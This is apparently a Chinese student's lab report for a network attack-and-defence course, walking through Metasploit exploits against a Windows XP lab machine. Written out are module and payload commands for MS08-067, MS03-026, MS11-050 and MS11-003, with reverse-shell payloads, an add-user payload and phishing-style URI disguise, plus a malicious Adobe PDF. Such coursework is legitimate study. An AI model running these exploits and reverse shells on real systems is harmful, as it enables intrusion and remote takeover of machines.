2018-2019-2 网络对抗技术 20165202 Exp5 MSF基础应用
作者:互联网
博客目录
- 二、实践内容
一个主动攻击实践,ms08_067(成功)、ms03_026(成功且唯一);
一个针对浏览器的攻击,如ms11_050(成功)ms11_03(失败、唯一);
一个针对客户端的攻击,如Adobe(成功);
- 成功应用任何一个辅助模块,title(成功且唯一)。
- 三、实验中遇到的问题及解决
- 四、用自己的话解释什么是exploit,payload,encode
一、实践目标
- 掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。
二、实践内容
1.Windows服务渗透攻击——MS08-067安全漏洞
攻击机kali(ip):192.168.153.132
靶机windows XP professional(ip):192.168.38.131
在kali输入msfconsole
进入控制台后依次输入以下指令:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi) > set LHOST 192.168.153.132 //kali的ip
msf exploit(ms08_067_netapi) > set LPORT 5202 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.153.133 //Windows XP机ip,特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit //探测并攻击
连接成功!并进行攻击:
1.2ms03_026
攻击机kali(ip):192.168.153.132
Windows XP Professional SP3:192.168.153.133
首先在攻击机kali输入msfconsole进入控制台
msf> use exploit/windows/dcerpc/ms03_026_dcom
看到命令提示符的改变表明该命令已经运行成功。(我们在此处使用的是ms023_026一款03年的古老漏洞攻击
)
之后为漏洞利用代码设置必要的参数,show options命令列出该漏洞利用代码的可用参数,之后用set命令即可对参数进行设置
RHOST用于指定远程目标主机的IP地址,RPORT用于指定默认的绑定端口。默认情况下,RPORT的值设置为135端口,在此,修改RHOST即可。
目前,RHOST的值已经被设置为目标IP地址,如果此时运行漏洞利用代码,会产生错误消息,因为还没有为该漏洞利用代码选择攻击载荷。
然后使用show payloads查找可攻击的payload
随便选一个例如window/adduser是在靶机的操作系统中添加新用户,然后运行show options命令,列出漏洞利用代码与攻击载荷的所有参数,在其中我们可以明显看出用户名以及密码,如图所示:
使用set USER和set PASS更改这些数值并通过exploit攻击
成功!
2.浏览器渗透攻击——MS11-050
攻击机kali(ip):192.168.153.132
靶机windows XP professional(ip):192.168.38.131
与实验一类似,首先选择要使用的漏洞攻击模块:use windows/browser/ms11_050_mshtml_cobjectelement
然后使用set payload windows/meterpreter/reverse_http
进行回连
在设置完kali的攻击机地址以及端口号后进行统一资源标识符路径设置set URIPATH 5202jhs
最后exploit进行攻击!成功回连
2.2关于MS11-003
这个漏洞是在/usr/share/metasploit-framework/modules/exploits/windows/browser
目录下找到的,就紧挨着MS11-050
介绍
...漏洞可在用户使用 Internet Explorer 查看特制 Web 页面或者用户打开一个加载特制库文件的合法 HTML 文件时允许远程执行代码。成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。对于 Windows 客户端上的 Internet Explorer 6、Internet Explorer 7 和 Internet Explorer 8,安全更新的等级为“严重”;对于 Windows 服务器上的 Internet Explorer 6、Internet Explorer 7 和 Internet Explorer 8,安全更新的等级为“中等”...
从官方文档上来看这个漏洞还是很厉害的,对Internet Explorer 6、Internet Explorer 7 和 Internet Explorer 8都有用
操作步骤
msfconsole
use exploit/windows/browser/ms11_003_ie_css_import//使用针对ms11_003的渗透攻击模块
set PAYLOAD windows/meterpreter/reverse_tcp//设置载荷为TCP反向回连
set URIPATH 20155228//设置URLPATH,就是跟在ip地址后面的页面的名称,内容可以随便写,比如说写成baidu.com将更具有迷惑性
set LHOST 192.168.232.131//设置本地主机地址
set LPORT 1030//设置本地主机端口,只要是大于1024的都可以
set SRVPORT 1031//设置钓鱼网站链接的假端口号,写成80也可以,写成443也行
set SRVHOST 192.168.232.131//钓鱼网站的地址要和本地主机地址保持一致
exploit
3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton
攻击机kali(ip):192.168.153.132
Windows XP Professional SP3 (ip):192.168.38.133
依然是熟悉的攻击准备操作:
注意此处不同的是我们要生成一个Adobe Reader(也就是pdf)格式的文件,来通过对方靶机对于此文件的开启,来实施攻击。这有些类似于实验二的后门(不同的是pdf文件需要被对方开启才能攻击成功),也有点像现在流行的“伪装者”计算机病毒(将病毒嵌入在图片或视频中通过对方的开启来攻击对方靶机)。
在这里遇到了一个困难,那就是生成的pdf格式文件默认为隐藏文件,而我们要把他传入靶机就注定要找到它。在此我想了两个办法,一个是使用find+地址+name+"*" -print的指令显示出隐藏文件。但是在这里失败了,并没能找到我的pdf文件。于是方法二就是因为已知文件路径,只需使用"cp"指令在当前目录下再复制出来一个就好了。
然后将pdf文件传入靶机中并打开,攻击机中查看攻击回连情况,发现成功!并可以查看靶机的信息,就可以为所欲为啦!
4应用title
辅助模块
msfconsole中使用info
了解title
msfconsole
info auxiliary/scanner/http/title
这个模块很简单就是查看网站的title
最后使用title对网站进行扫描
可以看出来很多网站都是对扫描做了防范的,但是电科院的网站也是
三、实验中遇到的问题及解决
1.在第一个实验MS08-067中出现了回连不成功的问题
解决:拷贝了同学的xp sp3英文版,可以看出靶机的选择确实很重要
2.adobe攻击中pdf文件
解决:参照实验步骤中详细解释,使用cp即可
四、用自己的话解释什么是exploit,payload,encode
Exploit是用来传送Payload的。Exploit相当于运载火箭,而payload相当于弹头,也就是说exploit起着传输载具的作用,payload就是一种包装。将病毒包装成一个可以执行的文件,或者包装成一个指定类型的文件。encode就是编码器,就是对攻击进行伪装。
五、实验总结
这次实验主要掌握三种不同的MSF漏洞攻击应用,即主动攻击、针对浏览器的攻击和针对客户端的攻击,本次实验预示着我们距离高端的网络攻防能力越来越近了,想必之后的实验将会更加高端更加有难度,本实验中使用的所有漏洞可能允许远程执行代码,都是出自微软的重要通告。正是因为诸多公司的努力,才使得我们的安全得到了保障,换个角度来说,不断发掘漏洞,也是提高我们本领的过程
标签:set,067,攻击,Exp5,20165202,漏洞,exploit,2019,192.168 来源: https://www.cnblogs.com/jhs888/p/10740899.html